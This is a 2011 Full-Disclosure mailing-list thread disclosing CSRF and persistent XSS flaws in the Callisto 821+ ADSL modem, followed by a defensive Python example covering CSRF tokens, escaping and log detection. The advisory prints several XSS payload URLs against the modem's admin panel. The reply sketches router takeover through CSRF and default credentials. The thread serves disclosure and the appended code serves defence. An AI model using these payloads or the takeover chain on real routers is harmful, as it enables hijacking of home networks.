Re: [Full-disclosure] Multiple CSRF and XSS vulnerabilities in ADSL modem Callisto 821+
- To: "-= Glowing Sex =-" <doomxd@xxxxxxxxx>
- Subject: Re: [Full-disclosure] Multiple CSRF and XSS vulnerabilities in ADSL modem Callisto 821+
- From: "MustLive" <mustlive@xxxxxxxxxxxxxxxxxx>
- Date: Tue, 2 Aug 2011 23:58:52 +0300
Hello 0xd0!
> So, you could maybe have to think if the router has port 80 open and i assume
> a remote-service
Yes, port 80 (and also 8008, as I wrote in my first advisory about Callisto
821+) is open, but it's accessible only locally - from the local computer and
LAN, and not from the Internet (by default it's disabled). And all those hundreds
of CSRF, XSS and DoS holes which I disclosed, without taking into account the
"unlimited" XSS and DoS holes, allow bypassing this limitation of disallowed
remote access and attacking the control panel remotely. In particular, it's
possible to enable remote access from the Internet to the control panel via CSRF
and then, using the default login and password (or, if worried that the user
changed it, creating a new user with a specified login and password via CSRF),
log into the control panel and take the router under control.
I wrote about such "unlimited" vulnerabilities in the article How to find billion
of XSS vulnerabilities
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-November/007233.html).
> Luckily some isp's do protect your modem, as many are so it seems, coded
> weakly in the firmware area.
The modem's developer had already protected (as they thought) their consumers by
disallowing access from the Internet by default. My ISP Ukrtelecom (already my
ex-ISP) didn't change this setting and also thought it was enough to protect
clients. After I first entered the control panel at the beginning of April and
found that it was full of CSRF holes (in addition to the default login and
password), I talked with Ukrtelecom's representative by phone.
I asked him why their company didn't change the default login and password and
didn't inform all their clients about the control panel, the login and password
for the specific model of router (different models have differences and no
documentation on routers was given to the clients), the fact that the default
login and password was used, and didn't recommend clients to change it. They
answered that because access from the Internet is disallowed by default, they
thought that everything was secure, and their company (a hole-making one - with
multiple holes on multiple of their web sites and in their Internet and
telecommunication services, which I've informed them about over the last years)
doesn't worry about its clients. And to my question about the multiple CSRF holes
which can remotely change any settings of the modem, he didn't answer, because he
doesn't know what it is. So attacks from local (from lamers or viruses on the local
computer or LAN) and attacks from the Internet on a modem owner who is logged into
the control panel are possible and not considered a threat at all by the developer
of the router and this ISP (the situation can be similar with other ISPs).
> That is consumer value,and i assume the company has released a patch ?
No, the company (Iskra) completely ignored these issues (and there are hundreds
of holes in their router). They ignored both my first letter from the 26th of May
and all other letters (24 letters in total during May - July about different
vulnerabilities). It looks like they don't care about the security of their
products or of their clients. Similarly with ISP Ukrtelecom, which is the
distributor of Iskra's routers in Ukraine (possibly the only ISP who distributes
these routers) and which also completely ignored the security of its own sites,
services, the routers which it sells, and of its clients.
So all consumers of Iskra modems should know the truth - the real situation with
the security of this company's routers. I made my decision (after all these holes
in Ukrtelecom and Iskra and their ignoring them) - I no longer use their services,
nor their modems. Besides, Iskra is a funny company - of their official e-mails
(mentioned at the site), service@ is not working at all, while e-marketing@ works,
but they're not answering, not fixing, just ignoring, as I've already mentioned.
> why then disclose the thing, i guess you either go one way or the other, know
> what i mean ?
No, I don't :-). But there are always reasons for disclosing vulnerabilities.
And there are reasons in this particular case; they are obvious and mentioned in
every post of mine about this router (besides worrying about the security of the
people, which is the default in all my disclosures).
> but yea, nice stuff if xss is your thing. ;')
All these hundreds of CSRF, XSS and DoS holes in this router are nice on their
own. And yes, they were all found by me. All these holes in Callisto 821+
(http://securityvulns.ru/news/ZTE/Callisto/821.html) (of the 24 advisories, 3APA3A
forgot to put two from July, so they are not listed in this list - I've already
reminded him two times, so he'd fix it).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
----- Original Message -----
From: -= Glowing Sex =-
To: MustLive
Cc: full-disclosure@xxxxxxxxxxxxxxxxx
Sent: Saturday, July 30, 2011 1:42 AM
Subject: Re: [Full-disclosure] Multiple CSRF and XSS vulnerabilities in ADSL modem Callisto 821+
So... advanced...
So, you could maybe have to think about whether the router has port 80 open, and I
assume a remote service; most ISPs would have the port 80 remote-assist open for
possibly helping a customer. I know that is the first thing I switch to 'off',
and actually, my ISP went through that with me on install.
Luckily some ISPs do protect your modem, as many are, so it seems, coded
weakly in the firmware area.
That is consumer value, and I assume the company has released a patch?
Usually, you would either contact a vendor and completely see it through, as in
wait for their reply. I do not see this in the actual timeline; I only see
that you have said you're working 'with' them, and their CEO... why then
disclose the thing? I guess you either go one way or the other, know what I
mean?
You should have a 2011-*-* - Vendor has now patched the issue regarding this,
and possibly, if it is serious, an assigned BID/CVE.
I am only assuming what I see with other disclosure policies... but yeah, nice
stuff if XSS is your thing. ;')
cheers
0xd0
On 30 July 2011 07:30, MustLive <mustlive@xxxxxxxxxxxxxxxxxx> wrote:
Hello list!
After discussion with Michael Simpson about these vulnerabilities in
Callisto 821+, I want to warn you about new multiple security
vulnerabilities in ADSL modem Callisto 821+ (SI2000 Callisto821+ Router).
These are Cross-Site Request Forgery and Cross-Site Scripting
vulnerabilities. In April I had already drawn the attention of Ukrtelecom's
representative (this modem was bought at Ukrtelecom) to multiple
vulnerabilities in this model of Callisto modems (other models could also
be affected).
SecurityVulns ID: 11700.
-------------------------
Affected products:
-------------------------
The vulnerable model is: SI2000 Callisto821+ Router: X7821 Annex A
v1.0.0.0 / Argon 4x1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. This model with other
firmware and also other Callisto models must also be vulnerable.
----------
Details:
----------
These attacks should be conducted on the modem owner who is logged into the
control panel. Taking into account that it's unlikely to catch him in this
state, it's possible to use the before-mentioned vulnerabilities
(http://websecurity.com.ua/5161/) for conducting a remote login (for
logging him into the control panel). After that it's possible to conduct a CSRF
or XSS attack.
CSRF (WASC-09):
Every connection in the section LAN connections, the default one as well as the
other connections, has advanced settings. Let's look at the example of the
default connection (iplan).
In the section Edit connection, in the subsection Edit Ip Interface
(http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan)
via CSRF it's possible to change the settings (IP, Mask and others) of the
connection.
In the subsection Edit Tcp Mss Clamp
(http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan.ImTcpMssClamp)
via CSRF it's possible to change the settings of the connection.
In the subsection Edit Rip Versions
(http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan.ImRipVersions)
via CSRF it's possible to change the settings of the connection.
In the subsection Edit NAT
(http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan.ImNatHelper)
via CSRF it's possible to change the settings of the connection.
XSS (WASC-08):
There are many persistent XSS vulnerabilities in above-mentioned four
subsections of section Edit connection.
In subsection Edit Ip Interface:
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Aipaddr=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Amask=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Adhcp=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Amtu=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3AsourceAddrValidation=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3AicmpRouterAdvertise=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Aenabled=%3Cscript%3Ealert(document.cookie)%3C/script%3E
In the subsections Edit Tcp Mss Clamp, Edit Rip Versions and Edit NAT the
situation is similar.
Attacks via the names of parameters are also possible (when the XSS code is
set in the name of the parameter), which I wrote about earlier
(http://websecurity.com.ua/5277/).
In this case the code will be executed immediately, and also when visiting the
pages http://192.168.1.1/system/events.html and
http://192.168.1.1/shared/event_log_selection.html.
------------
Timeline:
------------
2011.04.14 - informed Ukrtelecom about multiple vulnerabilities in modems,
which they give (sell) to their clients.
2011.07.23 - disclosed at my site.
2011.07.24 - informed developers (Iskratel).
I mentioned these vulnerabilities at my site
(http://websecurity.com.ua/5296/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
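The advisory above describes two defects in the modem's web control panel: state-changing edit forms that accept requests with no anti-CSRF check, and parameter names and values that are echoed into HTML unescaped (including the parameter-name variant that later fires on the event-log pages). The example below is added here and is not code from the advisory, from MustLive, or from the Callisto 821+ firmware. It shows, in Python, the defender-side shape of a fix for an embedded admin panel: a session-bound CSRF token plus an Origin/Referer check, escaping of both parameter names and values before they are rendered, and a small log check that flags requests carrying markup in either the name or the value of a query parameter. The panel origin is taken from the advisory; the secret, session id, and attacker hostname are constructed placeholders.

```python
# Added example (not from the advisory or the Callisto 821+ firmware).
# Models mitigations for the two defects the advisory describes:
# (1) edit forms accepted without any anti-CSRF check, and
# (2) parameter names and values echoed into HTML unescaped, including the
#     variant where the payload sits in the parameter NAME.
# The secret, session id and attacker host below are constructed placeholders.
import hashlib
import hmac
import html
from urllib.parse import parse_qsl, urlsplit

PANEL_ORIGIN = "http://192.168.1.1"  # the panel's own origin, as in the advisory

# One of the advisory's own request URLs, reused here as a sample log entry.
SAMPLE_URL = ("http://192.168.1.1/configuration/edit-form.html/edit?"
              "EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&"
              "EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Aipaddr="
              "%3Cscript%3Ealert(document.cookie)%3C/script%3E")


def csrf_token(session_id: str, secret: bytes) -> str:
    """Per-session token = HMAC(secret, session id). Nothing to store on the
    device: the token is recomputed from the session when a form is checked."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def origin_of(url: str) -> str:
    """scheme://host[:port] of a URL, or '' if it has no usable origin."""
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}" if p.scheme and p.netloc else ""


def check_csrf(headers: dict, form: dict, session_id: str, secret: bytes) -> tuple:
    """Two independent checks for a state-changing request: it must come from
    the panel's own origin (Origin header, falling back to Referer) and must
    carry the session-bound token. Returns (ok, reason)."""
    origin = headers.get("Origin") or origin_of(headers.get("Referer", ""))
    if origin != PANEL_ORIGIN:
        return False, "bad-origin"
    supplied = form.get("csrf_token", "").encode()
    expected = csrf_token(session_id, secret).encode()
    if not hmac.compare_digest(supplied, expected):  # constant-time compare
        return False, "bad-token"
    return True, "ok"


def render_setting_row(name: str, value: str) -> str:
    """Escape the parameter NAME as well as its value before echoing it:
    the advisory's second XSS variant puts the payload in the name, which the
    event-log pages later display."""
    return f"<tr><td>{html.escape(name)}</td><td>{html.escape(value)}</td></tr>"


SUSPICIOUS = ("<", ">", "javascript:", "onerror=", "onload=")


def find_injection_attempts(url: str) -> list:
    """Log check: URL-decode the query string and flag every parameter whose
    name or value carries markup. Returns [(where, parameter_name), ...]."""
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if any(s in name.lower() for s in SUSPICIOUS):
            hits.append(("name", name))
        if any(s in value.lower() for s in SUSPICIOUS):
            hits.append(("value", name))
    return hits


if __name__ == "__main__":
    secret = b"constructed-firmware-secret"   # placeholder
    sid = "sess-0001"                         # placeholder session id
    form = {"ipaddr": "192.168.1.1", "csrf_token": csrf_token(sid, secret)}
    print(check_csrf({"Origin": PANEL_ORIGIN}, form, sid, secret))
    print(check_csrf({"Referer": "http://attacker.example/p.html"}, form, sid, secret))
    print(render_setting_row("ipaddr", "<script>alert(1)</script>"))
    print(find_injection_attempts(SAMPLE_URL))
```

The origin check is deliberately strict: a request with neither Origin nor Referer is rejected, so a panel that must serve clients stripping Referer would rely on the token alone. Escaping at render time covers the event-log pages the advisory names because the stored name is escaped wherever it is displayed, not only on the edit form.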